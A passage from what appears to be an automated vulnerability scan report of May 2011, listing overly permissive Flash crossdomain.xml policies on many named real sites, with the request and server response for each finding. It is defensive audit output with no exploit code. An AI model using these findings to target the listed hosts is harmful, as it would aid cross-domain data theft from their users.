Cache-Control: max-age=86400
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.12. http://core.insightexpressai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:30:22 GMT
Content-Length: 139
Connection: close
Set-Cookie: DW=68c7671305207022; expires=Wed, 07-May-2031 13:30:22 GMT; path=/; domain=insightexpressai.com
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.13. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.14. http://feeds.delicious.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.15. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2a7f"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:28:12 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.16. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 13:28:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.17. http://mashable.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mashable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mashable.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 Mar 2009 21:45:51 GMT
ETag: "a01237-d8-4656b9b76c1c0"
Cache-Control: max-age=900, public, must-revalidate, proxy-revalidate
Content-Type: text/xml
Content-Length: 216
Vary: Accept-Encoding
X-Cacheable: Yes
Date: Thu, 12 May 2011 13:28:26 GMT
Connection: close
X-Served-By: 261656-web3
X-Cache-Hits: 0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

3.18. http://ping.crowdscience.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Tue, 26 Apr 2011 18:28:26 GMT
ETag: "85d59-e0-4a1d67d69c680"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

3.19. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 13:28:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.20. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 13:30:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 12 May 2011 13:30:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.21. http://s.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 May 2011 13:29:36 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.22. http://static.crowdscience.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.crowdscience.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: text/xml
Connection: close
ETag: "2c600567b987cf9352b28a7f78e61b56"
X-CF1: fI.iad2:cf:cacheB.iad2-01
Content-Length: 224
Last-Modified: Mon, 15 Mar 2010 02:56:11 GMT
X-CF2: L
Accept-Ranges: bytes

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

3.23. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:28:27 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "5f00162-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.24. http://tags.crwdcntrl.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:57 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Wed, 20 Apr 2011 11:31:48 GMT
ETag: "3978186-ba-4a157f85e5100"
Accept-Ranges: bytes
Content-Length: 186
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>

3.25. http://www.pcworld.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:59 GMT
Server: Apache
X-GasHost: gas1
X-GasOriginRetry: 0
X-GasOriginTime: 0
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 744
Content-Length: 194
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Etag: W/"194-1297458026000"
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

3.26. http://adx.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 13:30:17 GMT
Expires: Fri, 13 May 2011 13:30:17 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.27. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 9943

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.28. http://mads.com.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.com.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.com.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=959
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.29. http://mads.zdnet.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=858
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
